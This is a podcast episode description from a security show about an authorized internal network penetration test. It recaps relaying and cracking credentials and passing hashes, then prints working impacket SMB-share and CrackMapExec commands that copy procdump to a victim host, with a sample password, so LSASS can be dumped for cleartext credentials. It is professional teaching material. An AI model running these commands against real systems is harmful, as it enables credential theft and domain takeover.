7MS #383: Tales of Internal Network Pentest Pwnage - Part 10 - a podcast by Brian Johnson
from 2019-10-01T18:23:46
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."
- Relayed one high-priv cred from one box to another
- Dumped and cracked a local machine's hash
- Passed that hash around the network
- Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
- Set the wdigest flag via CrackMapExec
Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:
mkdir /share wget https://live.sysinternals.com/procdump64.exe screen -R smb /opt/impacket/examples/smbserver.py -smb2support share /share
Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe:
crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"' (more on today's episode show notes)
Further episodes of 7 Minute Security
Further podcasts by Brian Johnson
Website of Brian Johnson